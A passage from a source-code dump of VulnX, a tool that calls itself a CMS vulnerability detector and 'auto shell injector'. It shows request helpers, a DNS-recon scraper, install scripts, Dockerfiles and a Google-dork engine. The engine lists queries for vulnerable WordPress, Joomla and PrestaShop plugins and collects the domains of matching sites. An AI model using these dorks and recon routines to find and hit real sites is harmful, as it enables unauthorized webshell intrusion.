15 | cWMxxMMMMMMMMMMMMKlWMk
16 | .xWMMMMMMMMMMMMMMM0,%s
17 | .,OMd,,,;0MMMO,.
18 | .l0O.%sVXVX%sOX.%sVXVX%s0MO%sVXVX%s.0Kd,
19 | lWMMO0%sVXVX0%sOX.%sVXVX%sl%sVXVX%s.VXNMMO
20 | .MMX;.N0%sVXVX0%s0X.%sVXVXVX0%s.0M:.OMMl
21 | .OXc ,MMO%sVXVX0%sVX%s .VXVX0%s0MMo ,0X'
22 | 0x. :XMMMk%sVXVX.%sXO.%sVXVX%sdMMMWo. :X'
23 | .d 'NMMMMMMk%sVXVX%s..%sVXVX0%s.XMMMMWl ;c
24 | 'NNoMMMMMMx%sVXVXVXVXVX0.%sXMMk0Mc
25 | .NMx OMMMMMMd%sVXVXVX%sl%sVXVX%s.NW.;MMc
26 | :NMMd .NMMMMMMd%sVXVX%sdMd,,,,oc ;MMWx
27 | .0MN, 'XMMMMMMo%sVX%soMMMMMMWl 0MW,
28 | .0. .xWMMMMM:lMMMMMM0, kc
29 | ,O. .:dOKXXXNKOxc. do
30 | '0c -VulnX- ,Ol
31 | ;. :.
32 |
33 | %s# Coded By Anouar Ben Saad -%s @anouarbensaad
34 | %s"""
35 | %
36 | (bannerblue,bannerblue2,
37 | W,bannerblue2,W,bannerblue2,W,bannerblue2,
38 | W,bannerblue2,W,bannerblue2,W,bannerblue2,
39 | W,bannerblue2,W,bannerblue2,
40 | W,bannerblue2,W,bannerblue2,
41 | W,bannerblue2,W,bannerblue2,
42 | W,bannerblue2,W,bannerblue2,
43 | W,bannerblue2,
44 | W,bannerblue2,W,bannerblue2,
45 | W,bannerblue2,
46 | W,bannerblue2,
47 | W,Y,end
48 | ))
49 |
--------------------------------------------------------------------------------
/common/colors.py:
--------------------------------------------------------------------------------
1 | '''
2 | Module Of Colors.
3 | OS : Ubuntu
4 | '''
5 |
6 | import sys
7 |
8 | if sys.platform.lower().startswith(('os', 'win', 'darwin', 'ios')):
9 | # Colors shouldn't be displayed on Mac and Windows
10 | bannerblue = bannerblue2 = yellowhead = \
11 | W = Y = R = G = B = bg = green = \
12 | run = good = bad = info = red = end = que = \
13 | failexploit = vulnexploit = portopen = portclose = ''
14 | else:
15 | #banner Colors
16 | bannerblue = '\033[34m'
17 | bannerblue2 = '\033[1;1;94m'
18 | yellowhead = '\033[1;1;94m'
19 | #default colors
20 | W = '\033[97m' # white
21 | Y = '\033[93m' # yellow
22 | R = '\033[91m'
23 | G = '\033[92m'
24 | B = '\033[94m'
25 | bg = '\033[7;91m'
26 | green = '\033[92m'
27 | #action colors
28 | run = '\033[93m[~]\033[0m'
29 | good = '\033[92m[+]\033[0m'
30 | bad = '\033[91m[-]\033[0m'
31 | info = '\033[93m[!]\033[0m'
32 | red = '\033[91m'
33 | end = '\033[0m'
34 | que = '\033[94m[?]\033[0m'
35 | #test colors
36 | failexploit = '\033[91mFAIL\033[0m'
37 | vulnexploit = '\033[92mVULN\033[0m'
38 | portopen = '\033[92mOPEN \033[0m'
39 | portclose = '\033[91mCLOSE\033[0m'
40 |
--------------------------------------------------------------------------------
/common/output_wr.py:
--------------------------------------------------------------------------------
1 |
2 | import os
3 | import sys
4 |
5 | def writelogs(data, data_name, output_dir):
6 | """Write the results."""
7 | for data, data_name in zip(data, data_name):
8 | if data:
9 | filepath = output_dir + '/' + data_name + '.txt'
10 | with open(filepath, 'w+') as out_file:
11 | joined = '\n'.join(data)
12 | out_file.write(str(joined.encode('utf-8').decode('utf-8')))
13 | out_file.write('\n')
--------------------------------------------------------------------------------
/common/requestUp.py:
--------------------------------------------------------------------------------
1 |
2 | import random
3 | import requests
4 | from requests.exceptions import TooManyRedirects
5 | from common.uriParser import parsing_url as hostd
6 |
7 | SESSION = requests.Session()
8 | SESSION.max_redirects = 2
9 |
10 | def random_UserAgent():
11 | useragents_rotate = [
12 | "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
13 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)",
14 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
15 | "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
16 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
17 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
18 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
19 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)",
20 | "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
21 | "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
22 | "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
23 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36",
24 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
25 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
26 | "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36",
27 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1",
28 | "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8",
29 | "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01"
30 | ]
31 | useragents_random = random.choice(useragents_rotate)
32 | return useragents_random
33 |
34 | def getrequest(
35 | url,
36 | headers,
37 | timeout=3,
38 | ):
39 | """GetRequest without ssl verification"""
40 | headers = set()
41 | def get(url):
42 | # Selecting a random user-agent
43 | response = SESSION.get(
44 | url,
45 | headers=headers,
46 | verify=False,
47 | timeout=timeout,
48 | stream=True,
49 | )
50 | return response.text
51 | return get(url)
52 |
53 | def sendrequest(
54 | url,
55 | headers=None,
56 | data=None,
57 | timeout=3,
58 | ):
59 | """GetRequest without ssl verification"""
60 | headers = set()
61 | data = set()
62 | def post(url):
63 | response = SESSION.post(
64 | url,
65 | data=data,
66 | headers=headers,
67 | verify=False,
68 | timeout=timeout,
69 | stream=True,
70 | )
71 | return response.text
72 | return post(url)
--------------------------------------------------------------------------------
/common/threading.py:
--------------------------------------------------------------------------------
1 | import concurrent.futures
2 |
3 | from common.colors import info
4 |
5 | def threads(function, thread_count):
6 | """ Threadpool Uses """
7 | threads = concurrent.futures.ThreadPoolExecutor(
8 | max_workers=thread_count)
9 | confuture = (threads.submit(function))
10 | for i, _ in enumerate(concurrent.futures.as_completed(confuture)):
11 | print('%s Progress IN : %i' % (info, i + 1), end='\r')
12 | print('')
--------------------------------------------------------------------------------
/common/uriParser.py:
--------------------------------------------------------------------------------
1 | import re
2 | from urllib.parse import urlparse
3 |
4 | def parsing_url(url):
5 | host = urlparse(url).netloc
6 | return host
7 |
--------------------------------------------------------------------------------
/config/vulnx.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=vulnx
3 | Comment=VulnX 🕷️ Cms and vulnerabilites detector, & An intelligent bot auto shell injector.
4 | Encoding=UTF-8
5 | Exec=sh -c "vulnx;${SHELL:-bash}"
6 | Icon=vulnxicon.png
7 | StartupNotify=false
8 | Terminal=true
9 | Type=Application
10 | Categories=02-Vulnerability-Analysis;
11 | X-Kali-Package=vulnx
12 | Name[C]=vulnx
13 |
--------------------------------------------------------------------------------
/config/vulnxicon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LulzSecToolkit/vulnx/d5b6fba86c0d316622ad1f12d11884bd85a7a7cb/config/vulnxicon.png
--------------------------------------------------------------------------------
/docker/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3-alpine
2 | MAINTAINER BENSAAD Anouar bensaad.tig@gmail.com
3 |
4 | # Project Informations.
5 | LABEL name vulnx
6 | LABEL src "https://github.com/anouarbensaad/vulnx"
7 | LABEL creator anouarbensaad
8 | LABEL desc "Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector,\
9 | fast cms detection of target and fast scanner and informations gathering like\
10 | subdomains, \
11 | ipaddresses,\
12 | country, \
13 | org, \
14 | timezone, \
15 | region, \
16 | ans \
17 | and more ...\
18 | Instead of injecting shell and checking it works like all the other tools do,\
19 | vulnx analyses the response with and recieve if shell success uploaded or no.\
20 | vulnx is searching for urls with dorks."
21 |
22 | # Clonning Vulnx From Github
23 | RUN apk add --no-cache git && \
24 | git clone https://github.com/anouarbensaad/vulnx.git
25 |
26 | # Make vulnx group
27 | RUN addgroup vulnx
28 |
29 | # added \\vulnx [group] secondary group to vulnx.
30 | RUN adduser -G vulnx -g "vulnx user" -s /bin/sh -D vulnx
31 |
32 | # change vulnx owner of directory of project.
33 | RUN chown -R vulnx vulnx
34 |
35 | # Switch user.
36 | USER vulnx
37 |
38 | ENV APP_HOME=vulnx
39 |
40 | # Working−Directory
41 | WORKDIR $APP_HOME
42 |
43 | # Install Pip Packages.
44 | RUN pip install --user --upgrade pip && \
45 | pip install --user -r ./requirements.txt
46 |
47 | # Add Mount Volume Docker To Save All changes.
48 | VOLUME [ "/vulnx" ]
49 |
50 | # Entrypoint -> Command : While Creating Container.
51 | ENTRYPOINT [ "python", "vulnx.py" ]
52 |
53 | # Default Command When Starting The Container.
54 | CMD ["--help"]
55 |
--------------------------------------------------------------------------------
/docker/README:
--------------------------------------------------------------------------------
1 | ### Docker Documentation.
2 | Welcome to the vulnx DOCKER documentation.
3 | The vulnx DOCKER documentation is generated as a rule of usage docker.
4 |
5 | You can build docker-image & run container for no problem of comptability:
6 | $ docker build -t vulnx ./docker/
7 | $ docker run -it --name vulnx vulnx:latest -u http://example.com
8 |
--------------------------------------------------------------------------------
/docker/debian_stretch/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM debian:stretch-slim
2 | MAINTAINER BENSAAD Anouar bensaad.tig@gmail.com
3 |
4 | # Project Informations.
5 | LABEL name vulnx
6 | LABEL src "https://github.com/anouarbensaad/vulnx"
7 | LABEL creator anouarbensaad
8 | LABEL desc "Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector,\
9 | fast cms detection of target and fast scanner and informations gathering like\
10 | subdomains, \
11 | ipaddresses,\
12 | country, \
13 | org, \
14 | timezone, \
15 | region, \
16 | ans \
17 | and more ...\
18 | Instead of injecting shell and checking it works like all the other tools do,\
19 | vulnx analyses the response with and recieve if shell success uploaded or no.\
20 | vulnx is searching for urls with dorks."
21 |
22 | # Install Git,
23 | RUN apt-get update -qq && \
24 | apt-get install -qq -y --no-install-recommends --no-install-suggests && \
25 | git && \
26 | rm -rf /var/lib/apt/lists/* && \
27 | apt-get clean && \
28 | rm -rf /tmp/* /var/tmp/* /usr/share/doc/*
29 |
30 | # Make Vulnx Directory & Clonning Vulnx From Github
31 | RUN mkdir -p /usr/share/vulnx && cd usr/share/vulnx && \
32 | git clone https://www.github.com/anouarbensaad/vulnx
33 |
34 | # Make vulnx group
35 | RUN addgroup vulnx
36 |
37 | # added \\vulnx [group] secondary group to vulnx.
38 | RUN adduser -G vulnx -g "vulnx user" -s /bin/sh -D vulnx
39 |
40 | # change vulnx owner of directory of project.
41 | RUN chown -R vulnx vulnx
42 |
43 | # Switch user.
44 | USER vulnx
45 |
46 | # Working−Directory
47 | WORKDIR vulnx
48 |
49 | # Install Python3 & Pip 3
50 | RUN apt-get -qq update \
51 | apt-get install -qq -y --no-install-recommends \
52 | python3 \
53 | python3-pip && \
54 | rm -rf /var/lib/apt/lists/* && \
55 | apt-get clean && \
56 | rm -rf /tmp/* /var/tmp/* /usr/share/doc/*
57 |
58 | # Install Pip Packages.
59 | RUN pip3 install requests && \
60 | pip3 install bs4
61 |
62 | # Add Mount Volume Docker To Save All changes.
63 | VOLUME [ "/vulnx" ]
64 |
65 | #run container with it mode & run python3 vulnx.py -u ...
66 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | red="\e[0;31m"
4 | blue="\e[0;94m"
5 | green="\e[0;32m"
6 | off="\e[0m"
7 | #vulnx install function for Android. termux
8 | function banner(){
9 | echo -e "===== VULNX INSTALL ====="
10 | }
11 | function termuxOS() {
12 | echo -e "$red [$green+$red]$off Installing Python ...";
13 | pkg install python
14 | echo -e "$red [$green+$red]$off Installing Packages ...";
15 | pip install -r ./requirements.txt
16 | echo -e "$red [$green+$red]$off Checking directories ..."
17 | if [ -e "/data/data/com.termux/files/usr/share/vulnx" ]; then
18 | echo -e "$red [$green+$red]$off A previous installation was found Do you want to replace it? [Y/n]: "
19 | read replace
20 | if [ "$replace" == "y" ] || [ "$replace" == "Y" ] || [ -z "$replace" ]; then
21 | rm -r "/data/data/com.termux/files/usr/share/vulnx"
22 | rm "/data/data/com.termux/files/usr/bin/vulnx"
23 | else
24 | echo -e "$red [$green✘$red]$off If You Want To Install You Must Remove Previous Installations";
25 | echo -e "$red [$green✘$red]$off Installation Failed";
26 | exit
27 | fi
28 | fi
29 | echo -e "$red [$green+$red]$off Installing ...";
30 | mkdir "/data/data/com.termux/files/usr/share/vulnx"
31 | cp "vulnx.py" "/data/data/com.termux/files/usr/share/vulnx"
32 | cp "install.sh" "/data/data/com.termux/files/usr/share/vulnx"
33 | cp "update.sh" "/data/data/com.termux/files/usr/share/vulnx"
34 | cp -r "./common" "/data/data/com.termux/files/usr/share/vulnx"
35 | cp -r "./modules" "/data/data/com.termux/files/usr/share/vulnx"
36 | cp -r "./shell" "/data/data/com.termux/files/usr/share/vulnx"
37 | chmod +x /data/data/com.termux/files/usr/share/vulnx/update.sh
38 | echo -e "$red [$green+$red]$off Creating Symbolic Link ...";
39 | echo "#!/data/data/com.termux/files/usr/bin/bash
40 | python /data/data/com.termux/files/usr/share/vulnx/vulnx.py" '${1+"$@"}' > "vulnx";
41 | cp "vulnx" "/data/data/com.termux/files/usr/bin"
42 | chmod +x "/data/data/com.termux/files/usr/bin/vulnx"
43 | rm "vulnx";
44 | if [ -d "/data/data/com.termux/files/usr/share/vulnx" ] ;
45 | then
46 | echo -e "$red [$green+$red]$off Tool successfully installed and will start in 5s!";
47 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx"
48 | sleep 5;
49 | vulnx
50 | else
51 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !";
52 | exit
53 | fi
54 | }
55 | #vulnx install function for debian operating system. linux.
56 | function debianOS(){
57 | echo -e "$red [$green+$red]$off Installing python3... ";
58 | sudo apt-get install -y python3
59 | pip install -r ./requirements.txt
60 | echo -e "$red [$green+$red]$off Checking directories... "
61 | if [ -d "/usr/share/VulnX" ]; then
62 | echo -e "$red [$green+$red]$off A Directory VulnX Was Found! Do You Want To Replace It? [Y/n]:" ;
63 | read replace
64 | if [ "$replace" == "y" ] || [ "$replace" == "Y" ] || [ -z "$replace" ]; then
65 | sudo rm -r "/usr/share/vulnx"
66 | sudo rm "/usr/share/icons/vulnxicon.png"
67 | sudo rm "/usr/share/applications/vulnx.desktop"
68 | sudo rm "/usr/local/bin/vulnx"
69 | else
70 | echo -e "$red [$green✘$red]$off If You Want To Install You Must Remove Previous Installations";
71 | echo -e "$red [$green✘$red]$off Installation Failed";
72 | exit
73 | fi
74 | fi
75 | echo -e "$red [$green+$red]$off Installing ...";
76 | echo -e "$red [$green+$red]$off Creating Symbolic Link ...";
77 | echo -e "#!/bin/bash
78 | python3 /usr/share/vulnx/vulnx.py" '${1+"$@"}' > "vulnx";
79 | chmod +x "vulnx";
80 | sudo mkdir "/usr/share/vulnx"
81 | sudo cp "install.sh" "/usr/share/vulnx"
82 | sudo cp "update.sh" "/usr/share/vulnx"
83 | sudo cp -r "./common" "/usr/share/vulnx/"
84 | sudo cp -r "./modules" "/usr/share/vulnx/"
85 | sudo cp -r "./shell" "/usr/share/vulnx/"
86 | sudo chmod +x /usr/share/vulnx/update.sh
87 | sudo cp "vulnx.py" "/usr/share/vulnx"
88 | sudo cp "config/vulnxicon.png" "/usr/share/icons"
89 | sudo cp "config/vulnx.desktop" "/usr/share/applications"
90 | sudo cp "vulnx" "/usr/local/bin/"
91 | rm "vulnx";
92 | if [ -d "/usr/share/vulnx" ] ;
93 | then
94 | echo -e "$red [$green+$red]$off Tool Successfully Installed And Will Start In 5s!";
95 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx"
96 | sleep 5;
97 | vulnx
98 | else
99 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !";
100 | exit
101 | fi
102 | }
103 | #main
104 | if [ -d "/data/data/com.termux/files/usr/" ]; then
105 | banner
106 | echo -e "$red [$green+$red]$off Vulnx Will Be Installed In Your System";
107 | termuxOS
108 | elif [ -d "/usr/bin/" ];then
109 | banner
110 | echo -e "$red [$green+$red]$off Vulnx Will Be Installed In Your System";
111 | debianOS
112 | else
113 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !";
114 | exit
115 | fi
116 |
--------------------------------------------------------------------------------
/modules/__init__.py:
--------------------------------------------------------------------------------
1 | """The vulnx Modules."""
2 |
--------------------------------------------------------------------------------
/modules/dnsLookup.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | import base64
4 | import json
5 | from common.colors import red, green, bg, G, R, W, Y, G , good , bad , run , info , end , que , bannerblue
6 | from bs4 import BeautifulSoup
7 | from common.uriParser import parsing_url as hostd
8 |
9 | def results(table):
10 | res = []
11 | trs = table.findAll('tr')
12 | for tr in trs:
13 | tds = tr.findAll('td')
14 | pattern_ip = r'([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})'
15 | try:
16 | ip = re.findall(pattern_ip, tds[1].text)[0]
17 | domain = str(tds[0]).split('
')[0].split('>')[1]
18 | header = ' '.join(tds[0].text.replace('\n', '').split(' ')[1:])
19 | reverse_dns = tds[1].find('span', attrs={}).text
20 |
21 | additional_info = tds[2].text
22 | country = tds[2].find('span', attrs={}).text
23 | autonomous_system = additional_info.split(' ')[0]
24 | provider = ' '.join(additional_info.split(' ')[1:])
25 | provider = provider.replace(country, '')
26 | data = {'domain': domain,
27 | 'ip': ip,
28 | 'reverse_dns': reverse_dns,
29 | 'as': autonomous_system,
30 | 'provider': provider,
31 | 'country': country,
32 | 'header': header}
33 | res.append(data)
34 | except:
35 | pass
36 | return res
37 |
38 | def text_record(table):
39 | res = []
40 | for td in table.findAll('td'):
41 | res.append(td.text)
42 | return res
43 |
44 |
45 | def dnsdumper(url):
46 | domain = hostd(url)
47 | dnsdumpster_url = 'https://dnsdumpster.com/'
48 | response = requests.Session().get(dnsdumpster_url)
49 | soup = BeautifulSoup(response.text, 'html.parser')
50 | # If no match is found, the return object won't have group method, so check.
51 | try:
52 | csrf_token = soup.findAll('input', attrs={'name': 'csrfmiddlewaretoken'})[0]['value']
53 | except AttributeError: # No match is found
54 | csrf_token = soup.findAll('input', attrs={'name': 'csrfmiddlewaretoken'})[0]['value']
55 | print (' %s Retrieved token: %s' % (info,csrf_token))
56 | cookies = {'csrftoken': csrf_token}
57 | headers = {'Referer': 'https://dnsdumpster.com/'}
58 | data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain }
59 | response = requests.Session().post('https://dnsdumpster.com/',cookies=cookies, data=data, headers=headers)
60 | image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain)
61 | if response.status_code == 200:
62 | soup = BeautifulSoup(response.content, 'html.parser')
63 | tables = soup.findAll('table')
64 | res = {}
65 | res['domain'] = domain
66 | res['dns_records'] = {}
67 | res['dns_records']['dns'] = results(tables[0])
68 | res['dns_records']['mx'] = results(tables[1])
69 | print(' %s Search for DNS Servers' % que)
70 | for entry in res['dns_records']['dns']:
71 | print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format(**entry)% (good,good,good,bannerblue,end)))
72 | print(' %s Search for MX Records ' % que)
73 | for entry in res['dns_records']['mx']:
74 | print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format(**entry)% (good,good,good,bannerblue,end)))
75 | def domain_info(url):
76 | domain = hostd(url)
77 | dnsdumpster_url = 'https://dnsdumpster.com/'
78 | response = requests.Session().get(dnsdumpster_url).text
79 | # If no match is found, the return object won't have group method, so check.
80 | try:
81 | csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response).group(1)
82 | except AttributeError: # No match is found
83 | csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response)
84 | cookies = {'csrftoken': csrf_token}
85 | headers = {'Referer': 'https://dnsdumpster.com/'}
86 | data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain }
87 | response = requests.Session().post('https://dnsdumpster.com/',cookies=cookies, data=data, headers=headers)
88 | image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain)
89 | if response.status_code == 200:
90 | soup = BeautifulSoup(response.content, 'html.parser')
91 | tables = soup.findAll('table')
92 | res = {}
93 | res['domain'] = domain
94 | res['dns_records'] = {}
95 | res['dns_records']['host'] = results(tables[3])
96 | print(' %s SubDomains' % que)
97 | for entry in res['dns_records']['host']:
98 | print((" %s SubDomain : {domain} \n %s IP : {ip} \n %s----------------%s".format(**entry)% (good,good,bannerblue,end)))
99 |
--------------------------------------------------------------------------------
/modules/dorksEngine.py:
--------------------------------------------------------------------------------
1 | '''
2 | Dorks Engine Module.
3 | github Repository : http://github.com/anouarbensaad/findorks
4 | '''
5 |
6 | import requests
7 | import re
8 | import time
9 | import random
10 | import os
11 | from common.colors import run,W,end,good,bad,que,info,bannerblue
12 | from common.uriParser import parsing_url as parsify
13 | filename = time.strftime("%Y-%m-%d-%H%M%S-Dorks")
14 | output_dirdorks = 'logs'+'/Dorks'
15 |
16 | if not os.path.exists(output_dirdorks): # if the directory doesn't exist
17 | os.mkdir(output_dirdorks) # create a new directory
18 | export = open('%s/%s.txt' % (output_dirdorks,filename),'w')
19 | else:
20 | export = open('%s/%s.txt' % (output_dirdorks,filename),'w')
21 |
22 |
23 | wp_contentdorks = {
24 | 'blaze' : 'inurl:"/wp-content/plugins/blaze-slide-show-for-wordpress/"',
25 | 'catpro' : 'inurl:"/wp-content/plugins/wp-catpro/"',
26 | 'cherry' : 'inurl:"/wp-content/plugins/cherry-plugin/"',
27 | 'dm' : 'inurl:"/wp-content/plugins/downloads-manager/"',
28 | 'fromcraft' : 'inurl:"/wp-content/plugins/formcraft/file-upload/"',
29 | 'synoptic' : 'inurl:"/wp-content/themes/synoptic/lib/avatarupload"',
30 | 'shop' : 'inurl:"/wp-content/plugins/wpshop/includes/"',
31 | 'revslider' : 'inurl "/wp-content/plugins/revslider/"',
32 | 'adsmanager' : 'inurl:"/wp-content/plugins/simple-ads-manager/"',
33 | 'inboundiomarketing': 'inurl:"/wp-content/plugins/inboundio-marketing/"',
34 | 'thumbslider' : 'inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider"',
35 | }
36 | wp_admindorks = {
37 | 'wysija' : 'inurl":/wp-admin/admin-post.php?page=wysija_campaigns"',
38 | 'powerzoomer' : 'inurl:"/wp-admin/admin.php?page=powerzoomer_manage"',
39 | 'showbiz' : 'inurl:"/wp-admin/admin-ajax.php"',
40 | }
41 |
42 | wpajx = {
43 | 'jobmanager' : 'inurl:"/jm-ajax/upload_file/"',
44 | }
45 |
46 |
47 | wpindex = {
48 | 'injection' : 'inurl:"/index.php/wp-json/wp/"',
49 | }
50 |
51 |
52 | joomla = {
53 | 'comjce' : 'inurl":index.php?option=com_jce"',
54 | 'comfabrik' : 'inurl":index.php?option=com_fabrik"',
55 | 'comjdownloads' : 'inurl":index.php?option=com_fabrik"',
56 | 'comfoxcontact' : 'inurl":index.php?option=com_foxcontact"',
57 | }
58 |
59 | prestashop = {
60 | 'columnadverts' : 'inurl":/modules/columnadverts/"',
61 | 'soopabanners' : 'inurl":/modules/soopabanners/"',
62 | 'vtslide' : 'inurl":/modules/soopabanners/"',
63 | 'simpleslideshow' : 'inurl":/modules/simpleslideshow/"',
64 | 'productpageadverts' : 'inurl":/modules/productpageadverts/"',
65 | 'productpageadvertsb' : 'inurl":/modules/homepageadvertise2/"',
66 | 'jro_homepageadvertise' : 'inurl":/modules/jro_homepageadvertise/"',
67 | 'attributewizardpro' : 'inurl":/modules/attributewizardpro/"',
68 | 'oneattributewizardpro' : 'inurl":/modules/1attributewizardpro/"',
69 | 'attributewizardpro_old' : 'inurl":/modules/attributewizardpro.OLD/"',
70 | 'attributewizardpro_x' : 'inurl":/modules/attributewizardpro_x/"',
71 | 'advancedslider' : 'inurl":/modules/advancedslider/"',
72 | 'cartabandonmentpro' : 'inurl":/modules/cartabandonmentpro/"',
73 | 'cartabandonmentpro_old' : 'inurl":/modules/cartabandonmentproOld/"' ,
74 | 'videostab' : 'inurl":/modules/videostab/"',
75 | 'wg24themeadministration': 'inurl":/modules//wg24themeadministration/"',
76 | 'fieldvmegamenu' : 'inurl":/modules/fieldvmegamenu/"',
77 | 'wdoptionpanel' : 'inurl":/modules/wdoptionpanel/"',
78 | 'pk_flexmenu' : 'inurl":/modules/pk_flexmenu/"',
79 | 'pk_vertflexmenu' : 'inurl":/modules/pk_vertflexmenu/"',
80 | 'nvn_export_orders' : 'inurl":/modules/nvn_export_orders/"',
81 | 'tdpsthemeoptionpanel' : 'inurl":/modules/tdpsthemeoptionpanel/"',
82 | 'masseditproduct' : 'inurl":/modules/lib/redactor/"',
83 | }
84 |
85 | class Dorks:
86 |
87 | @staticmethod
88 | def getdorksbyname(exploitname):
89 | if exploitname in wp_contentdorks:
90 | return wp_contentdorks[exploitname]
91 | elif exploitname in wp_admindorks:
92 | return wp_admindorks[exploitname]
93 | elif exploitname in wpajx:
94 | return wpajx[exploitname]
95 | elif exploitname in wpindex:
96 | return wpindex[exploitname]
97 | elif exploitname in joomla:
98 | return joomla[exploitname]
99 | elif exploitname in prestashop:
100 | return prestashop[exploitname]
101 |
102 | @staticmethod
103 | def searchengine(exploitname,headers,output_dir,numberpage):
104 | try :
105 | print (' %s Searching for %s dork url' %(run,exploitname))
106 | numberpage = numberpage*10
107 | for np in range(0,numberpage,10):
108 | starty = time.time()
109 | if np==0:
110 | time.sleep(random.randint(1,2))
111 | print(' %s Page n° 1 ' % (info))
112 | googlequery = 'https://www.google.com/search?q='+Dorks.getdorksbyname(exploitname)
113 | print(' %s searching for : %s'% (que,googlequery))
114 | res = requests.get(googlequery,headers).text
115 | if (re.findall(re.compile(r'CAPTCHA'),res)):
116 | print(' %s Bot Detected The block will expire shortly' % bad)
117 | else:
118 | Dorks.WP_dorksconditions(exploitname,res,output_dir)
119 | print ('------------------------------------------------')
120 | else:
121 | time.sleep(random.randint(3,5))
122 | print(' %s Page n° %i ' % (info,np/10+1))
123 | googlequery = 'https://www.google.com/search?q='+Dorks.getdorksbyname(exploitname)+'&start='+str(np)
124 | res = requests.get(googlequery,headers).text
125 | print(' %s searching for : %s'% (que,googlequery))
126 | if (re.findall(re.compile(r'CAPTCHA'),res)):
127 | print(' %s Bot Detected The block will expire shortly' % bad)
128 | else:
129 | Dorks.WP_dorksconditions(exploitname,res,output_dir)
130 | print ('------------------------------------------------')
131 | endy = time.time()
132 | elapsed = endy - starty
133 | print (' %s Elapsed Time : %.2f seconds' % (info,elapsed))
134 | print("%s----------------%s"%(bannerblue,end))
135 | export.close()
136 | except Exception as msg:
137 | print(' %s exploitname %s ' %(bad,msg))
138 | np=+10
139 |
140 | @staticmethod
141 | def WP_dorksconditions(exploitname,response,output_dir):
142 | webs = []
143 | if exploitname in wp_contentdorks:
144 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/wp-content/plugins/\w+'),response)
145 | if len(dorks) > 0:
146 | for web in dorks:
147 | if web not in webs:
148 | webs.append(web)
149 | for i in range(len(webs)):
150 | domains = parsify(webs[i])
151 | print (' %s URL : %s ' %(good , webs[i]))
152 | print (' %s DOMAIN: %s ' %(good , domains))
153 | export.write(domains)
154 | export.write('\n')
155 | elif exploitname in wp_admindorks:
156 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/wp-admin/\w+'),response)
157 | if len(dorks) > 0:
158 | for web in dorks:
159 | if web not in webs:
160 | webs.append(web)
161 | for i in range(len(webs)):
162 | domains = parsify(webs[i])
163 | print (' %s URL : %s ' %(good , webs[i]))
164 | print (' %s DOMAIN: %s ' %(good , domains))
165 | export.write(domains)
166 | export.write('\n')
167 | elif exploitname in wpajx:
168 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/jm-ajax/upload_file/'),response)
169 | if len(dorks) > 0:
170 | for web in dorks:
171 | if web not in webs:
172 | webs.append(web)
173 | for i in range(len(webs)):
174 | domains = parsify(webs[i])
